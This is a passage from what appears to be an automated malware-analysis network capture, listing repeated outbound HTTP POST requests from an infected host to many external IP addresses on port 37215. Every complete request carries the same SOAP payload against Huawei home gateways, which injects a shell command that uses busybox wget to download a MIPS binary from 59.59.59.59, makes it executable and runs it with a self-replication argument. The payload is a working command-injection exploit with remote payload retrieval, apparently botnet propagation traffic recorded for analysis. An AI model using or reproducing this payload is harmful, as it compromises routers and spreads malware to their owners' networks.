                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2311192.168.2.155585841.95.31.937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:29.317234039 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2312192.168.2.1550064134.81.173.18337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:29.342515945 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2313192.168.2.155086041.152.167.19437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:29.347266912 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2314192.168.2.1550036157.135.213.6737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:29.347718954 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2315192.168.2.1548764190.40.171.15837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:29.347815037 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2316192.168.2.154947841.100.176.23937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:29.348073959 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2317192.168.2.1540208157.65.159.9237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:29.348634005 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2318192.168.2.1559054197.15.218.15537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:29.348783970 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2319192.168.2.1539486113.228.106.23037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:29.348835945 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2320192.168.2.1559546197.78.255.1637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:29.348908901 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
